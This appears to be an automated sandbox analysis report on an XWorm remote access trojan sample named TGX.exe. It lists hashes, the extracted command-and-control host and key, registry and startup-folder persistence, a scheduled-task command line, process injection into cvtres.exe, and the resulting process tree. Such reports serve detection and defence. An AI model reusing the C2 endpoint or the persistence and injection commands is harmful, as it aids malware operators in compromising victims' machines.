Analysis
-
max time kernel
146s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2023 04:39
Behavioral task
behavioral1
Sample
TGX.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
TGX.exe
Resource
win10v2004-20230221-en
General
-
Target
TGX.exe
-
Size
38KB
-
MD5
ee272fb8a6844eb8b30f35614f0baa1f
-
SHA1
48be70669ce639e648fca442892f458c8729aca0
-
SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
-
SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
SSDEEP
768:DzpMBIG6sJLIuv+044PF5Ph9tbkOwhnICFYCgc/:P6PDLfdFD9t4OwW8zJ
Malware Config
Extracted
xworm
browser-bangladesh.at.ply.gg:14018
Dmpd64MhhEQE1POv
-
install_file
USB.exe
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
TGX.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation TGX.exe -
Drops startup file 2 IoCs
Processes:
TGX.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk TGX.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk TGX.exe -
Executes dropped EXE 3 IoCs
Processes:
TGX.exeTGX.exeTGX.exepid process 2816 TGX.exe 3652 TGX.exe 3936 TGX.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
TGX.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGX = "C:\\Users\\Admin\\AppData\\Roaming\\TGX.exe" TGX.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
TGX.exedescription pid process target process PID 4640 set thread context of 4636 4640 TGX.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 20 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 4364 explorer.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
TGX.exepowershell.exepid process 4640 TGX.exe 3596 powershell.exe 3596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
TGX.exeTGX.exepowershell.exeTGX.exeTGX.exedescription pid process Token: SeDebugPrivilege 4640 TGX.exe Token: SeDebugPrivilege 4640 TGX.exe Token: SeDebugPrivilege 2816 TGX.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3652 TGX.exe Token: SeDebugPrivilege 3936 TGX.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
TGX.exeexplorer.exepid process 4640 TGX.exe 4364 explorer.exe 4364 explorer.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
TGX.execvtres.exepowershell.exedescription pid process target process PID 4640 wrote to memory of 1296 4640 TGX.exe schtasks.exe PID 4640 wrote to memory of 1296 4640 TGX.exe schtasks.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4640 wrote to memory of 4636 4640 TGX.exe cvtres.exe PID 4636 wrote to memory of 3596 4636 cvtres.exe powershell.exe PID 4636 wrote to memory of 3596 4636 cvtres.exe powershell.exe PID 4636 wrote to memory of 3596 4636 cvtres.exe powershell.exe PID 3596 wrote to memory of 4384 3596 powershell.exe explorer.exe PID 3596 wrote to memory of 4384 3596 powershell.exe explorer.exe PID 3596 wrote to memory of 4384 3596 powershell.exe explorer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TGX.exe"C:\Users\Admin\AppData\Local\Temp\TGX.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TGX" /tr "C:\Users\Admin\AppData\Roaming\TGX.exe"2⤵
- Creates scheduled task(s)
PID:1296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" browser-bangladesh.at.ply.gg 14018 <123456789> AA7744BB240B53EC55E32⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text4⤵PID:4384
-
C:\Users\Admin\AppData\Roaming\TGX.exeC:\Users\Admin\AppData\Roaming\TGX.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4364
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:4312
-
C:\Users\Admin\AppData\Roaming\TGX.exeC:\Users\Admin\AppData\Roaming\TGX.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
C:\Users\Admin\AppData\Roaming\TGX.exeC:\Users\Admin\AppData\Roaming\TGX.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3936
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TGX.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoitsbt4.kfj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\TGX.exeFilesize
38KB
MD5ee272fb8a6844eb8b30f35614f0baa1f
SHA148be70669ce639e648fca442892f458c8729aca0
SHA2569b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
C:\Users\Admin\AppData\Roaming\TGX.exeFilesize
38KB
MD5ee272fb8a6844eb8b30f35614f0baa1f
SHA148be70669ce639e648fca442892f458c8729aca0
SHA2569b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
C:\Users\Admin\AppData\Roaming\TGX.exeFilesize
38KB
MD5ee272fb8a6844eb8b30f35614f0baa1f
SHA148be70669ce639e648fca442892f458c8729aca0
SHA2569b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
C:\Users\Admin\AppData\Roaming\TGX.exeFilesize
38KB
MD5ee272fb8a6844eb8b30f35614f0baa1f
SHA148be70669ce639e648fca442892f458c8729aca0
SHA2569b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
C:\Users\Admin\AppData\Roaming\TGX.exeFilesize
38KB
MD5ee272fb8a6844eb8b30f35614f0baa1f
SHA148be70669ce639e648fca442892f458c8729aca0
SHA2569b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
-
memory/3596-153-0x0000000003130000-0x0000000003166000-memory.dmpFilesize
216KB
-
memory/3596-155-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/3596-168-0x00000000067B0000-0x00000000067CE000-memory.dmpFilesize
120KB
-
memory/3596-158-0x0000000006050000-0x00000000060B6000-memory.dmpFilesize
408KB
-
memory/3596-157-0x0000000005970000-0x0000000005992000-memory.dmpFilesize
136KB
-
memory/3596-156-0x00000000059A0000-0x0000000005FC8000-memory.dmpFilesize
6.2MB
-
memory/3596-154-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/4636-173-0x0000000005800000-0x0000000005810000-memory.dmpFilesize
64KB
-
memory/4636-152-0x0000000005CF0000-0x0000000005D56000-memory.dmpFilesize
408KB
-
memory/4636-151-0x0000000005800000-0x0000000005810000-memory.dmpFilesize
64KB
-
memory/4636-148-0x00000000059B0000-0x0000000005A42000-memory.dmpFilesize
584KB
-
memory/4636-150-0x00000000060A0000-0x0000000006644000-memory.dmpFilesize
5.6MB
-
memory/4636-149-0x0000000005A50000-0x0000000005AEC000-memory.dmpFilesize
624KB
-
memory/4636-147-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/4640-133-0x0000000000410000-0x0000000000420000-memory.dmpFilesize
64KB
-
memory/4640-143-0x000000001B960000-0x000000001B970000-memory.dmpFilesize
64KB
-
memory/4640-134-0x000000001B960000-0x000000001B970000-memory.dmpFilesize
64KB